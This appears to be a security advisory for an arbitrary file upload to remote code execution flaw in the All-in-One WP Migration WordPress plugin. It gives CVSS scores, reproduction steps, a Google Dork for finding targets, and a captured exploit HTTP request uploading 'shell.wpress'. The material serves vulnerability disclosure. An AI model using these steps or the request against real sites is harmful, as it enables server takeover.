7.2 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
6.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
The plugin does not validate uploaded files’ extension, which allows administrators to upload PHP files on their site, even on multisite installations.
To reproduce: - Log in, Click all in one WP migration import to use the import from file function. - Intercept wp-admin/admin- ajax.php?action=ai1wm_ import&ai1wm;_ Import = 1 request. - Change the parameters of “upload-file”, “storage” and “archive”. Insert malicious PHP code into “upload-file”. Submit the request. - Access the URL under to execute system commands: wp-content/plugins/all-in-one-wp-migration/storage/[storage]/[archive] # Exploit Title: WordPress All-in-One WP Migration Plugin - Arbitrary File Upload to Remote Code Execution # Google Dork: inurl:/wp-admin/admin-ajax.php # Date: 23/12/2020 # Exploit Author: YICHENGLIU_chenfeng lab # Vendor Homepage: https://cn.wordpress.org/plugins/all-in-one-wp-migration/advanced/ # Version: All-in-One WP Migration <=7.38 # Tested on: windows 10(x64) # data in http request : POST example/wp-admin/admin-ajax.php?action=ai1wm_import&ai1wm;_import=1 HTTP/1.1 Host: 192.168.9.240 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: / Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://192.168.9.240/WordPresscn/wp-admin/admin.php?page=ai1wm_import X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------3937767834299093780715813797 Content-Length: 740 Origin: http://192.168.9.240 Connection: close Cookie: wordpress_35a9534a308351ed3717c8a5ae6460b0=admin%7C1616316196%7Cw4f8i4PHSUNfb6q7qC1r6HiV1d78wA1LrdXcmbW51iV%7Caeb6bc83b040df5b4acfbbaf7a18681cb06c3210046627978bad64d8419f06e6; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_35a9534a308351ed3717c8a5ae6460b0=admin%7C1616316196%7Cw4f8i4PHSUNfb6q7qC1r6HiV1d78wA1LrdXcmbW51iV%7Cc6d2ef5724f21ca0e0cc446643f6f8d68c900452b87b412b2eb7282c32161846; wp-settings-time-1=1616143799 -----------------------------3937767834299093780715813797 Content-Disposition: form-data; name=“upload-file”; filename=“shell.wpress” Content-Type: application/octet-stream
CPE | Name | Operator | Version |
---|---|---|---|
all-in-one-wp-migration | lt | 7.41 |
7.2 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
6.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P